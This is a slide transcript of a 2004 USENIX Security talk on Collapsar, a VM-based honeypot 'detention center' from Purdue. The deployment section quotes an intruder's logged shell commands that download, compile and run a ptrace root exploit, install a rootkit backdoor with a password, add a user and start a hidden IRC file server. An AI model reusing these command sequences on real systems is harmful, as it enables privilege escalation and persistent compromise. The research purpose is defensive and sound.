collapsar: a vm-based architecture for network attack detention center xuxian jiang, dongyan xu...
Post on 21-Dec-2015
222 views
TRANSCRIPT
Collapsar: A VM-Based Architecture for Network Attack Detention Center
Xuxian Jiang, Dongyan Xu
Department of Computer Sciences Center for Education and Research in Information
Assurance and Security (CERIAS) Purdue University
USENIX Security 2004USENIX Security 2004
Outline
Motivation Collapsar architecture and features Collapsar design, implementation, and
performance Collapsar deployment and real-world
incidents Conclusion and on-going work
Motivation
Need for network attack containment and monitoring Worm outbreaks (MSBlaster, Sasser…) Debian project servers hacked (Nov. 2003) PlanetLab nodes compromised (Dec. 2003) And more
Motivation
Promise of honeypots Providing insights into intruders’
motivations, tactics, and tools Highly concentrated datasets w/ low noise Low false-positive and false negative rate
Discovering unknown vulnerabilities/exploitations Example: CERT advisory CA-2002-01 (solaris CDE
subprocess control daemon – dtspcd)
Current Honeypot Operation
Individual honeypots Limited local view of attacks
Federation of distributed honeypots Deploying honeypots in different networks Exchanging logs and alerts
Problems Difficulties in distributed management Lack of honeypot expertise Inconsistency in security and management
policies Example: log format, sharing policy, exchange
frequency
Our Solution: Collapsar
Based on the HoneyFarm idea of Lance Spitzner
Achieving two (seemingly) conflicting goals Distributed honeypot presence Centralized honeypot operation
Key ideas Leveraging unused IP addresses in each
network Diverting corresponding traffic to a
“detention” center (transparently) Creating VM-based honeypots in the center
VM-based Honeypot
Collapsar Architecture
Redirector
Redirector Redirector
Correlation Engine
Management Station
Production Network
Production Network
Production Network
Collapsar Center
Attacker
Front-End
Comparison with Current Approaches
Overlay-based approach (e.g., NetBait, Domino overlay) Honeypots deployed in different sites Logs aggregated from distributed honeypots Data mining performed on aggregated log
information Key difference: where the attacks take place (on-site vs. off-site)
Comparison with Current Approaches
Sinkhole networking approach (e.g., iSink ) “Dark” space to monitor Internet
abnormality and commotion (e.g. msblaster worms)
Limited interaction for better scalability Key difference: contiguous large address
blocks (vs. scattered addresses)
Comparison with Current Approaches
Low-interaction approach (e.g., honeyd, iSink ) Highly scalable deployment Low security risks Key difference: emulated services (vs. real
things) Less effective to reveal unknown vulnerabilities Less effective to capture 0-day worms
Collapsar Design
Functional components Redirector Collapsar Front-End Virtual honeypots
Assurance modules Logging module Tarpitting module Correlation module
Functional Components Redirector
Running in each participating network Capturing traffic toward unused IP addresses Redirecting to Collapsar Front-End
Two implementation options Proxy-ARP approach
Longer latency Minimum change to network infrastructure
GRE (Generic Routing Encapsulation) approach Lower latency Requiring router re-configuration Missing attack traffic from inside a domain
Functional Components
Collapsar Front-End Dispatching incoming traffic to different
honeypots Transparent bridging
Mitigating security risks Transparent firewalling Packet re-writing
Assurance module plug-in Logging modules Tarpitting modules
Functional Components
Virtual honeypots VM-based high-interaction honeypots
VMware Enhanced User-Mode Linux (UML)
Commodity OS and popular services Linux, Windows, Solaris, FreeBSD Apache, samba, sendmail, named
Capability of forensic analysis System image snapshot / restoration
Assurance Modules Logging module
Traffic logging Where: Front-End and honeypots
Keystroke logging Where: honeypots
Tarpitting module Mitigating security risks
Where: Front-End
Correlation module Mining and correlation
(e.g., tcpdump, snort)(e.g., tcpdump, snort)
(e.g., sebek)(e.g., sebek)
(e.g., snort-inline)(e.g., snort-inline)
Measurement set-up
Metrics TCP throughput
Nock (http://www.cs.wisc.edu/~zandy/p/nock) ICMP latency
Performance Measurement
Dell PowerEdge Server (2.6GHz Xeon/2GB Memory)
Dell PowerEdge Server (2.6GHz Xeon/2GB Memory)Dell Desktop PC
(1.8GHz Pentium 4/768MB Memory)
Dell Desktop PC (1.8GHz Pentium 4/768MB Memory)
Collapsar Center
Collapsar Center
A
VMware or UMLVMware or UML
H
Redirector Front-End
TCP throughputTCP throughput
Measurement Results
Measurement Results
ICMP latencyICMP latency
Collapsar Deployment
Deployed in a local environment for a two-month period in 2003
Traffic redirected from five networks Three wired LANs One wireless LAN One DSL network
~ 40 honeypots analyzed so far Internet worms (MSBlaster, Enbiei, Nachi ) Interactive intrusions (Apache, Samba) OS: Windows, Linux, Solaris, FreeBSD
Incident: Apache Honeypot/VMware
Vulnerabilities Vul 1: Apache (CERT® CA-2002-17) Vul 2: Ptrace (CERT® VU-6288429)
Time-line Deployed: 23:44:03pm, 11/24/03 Compromised: 09:33:55am, 11/25/03
Attack monitoring Detailed log
http://www.cs.purdue.edu/homes/jiangx/collapsar
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`' ******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhat-release`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suse-release`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat /etc/slackware-version`; fi; uname -a; id; echo
[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p
1. Gaining a regular account: apache
2. Escalating to the root privilege
Incident: Apache Honeypot/VMware
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTY-Release-0.53b[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd;mkdir .logs;cd .logs[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null &
3. Installing a set of backdoors
4. Adding the ftp user and installing a
IRC-based ftp server
Incident: Apache Honeypot/VMware
Incident: Windows XP Honeypot/VMware
Vulnerability RPC DCOM Vul.
(Microsoft Security Bulletin MS03-026)
Time-line Deployed: 22:10:00pm,
11/26/03 MSBlaster: 00:36:47am,
11/27/03 Enbiei: 01:48:57am,
11/27/03 Nachi: 07:03:55am,
11/27/03
Log Correlation: Stepping Stoneiii.jjj.kkk.11 compromised a honeypot & installed a rootkit, which contained
an ssh backdoor
iii.jjj.kkk.11 compromised a honeypot & installed a rootkit, which contained
an ssh backdoor
xx.yyy.zzz.3 connected to the ssh backdoor using the same passwd
xx.yyy.zzz.3 connected to the ssh backdoor using the same passwd
Log Correlation: Network Scanning
Conclusions
A new architecture for attack containment and monitoring Distributed presence and centralized operation
of honeypots Good potential in attack correlation and log
mining Unique features
Aggregation of Scattered unused IP addresses Off-site (relative to participating networks) attack
occurrences and monitoring Real services for unknown vulnerability
revelation
On-going Work
Integration into trusted server architectures (SODA and Poly2)
On-demand honeypot customization Collapsar center federation Scalability
Testbed for worm containment (coming soon)
Thank you.
For more information:
Email: {dxu, jiangx}@cs.purdue.eduURL: www.cs.purdue.edu/~dxu
Google: “Purdue Collapsar friends”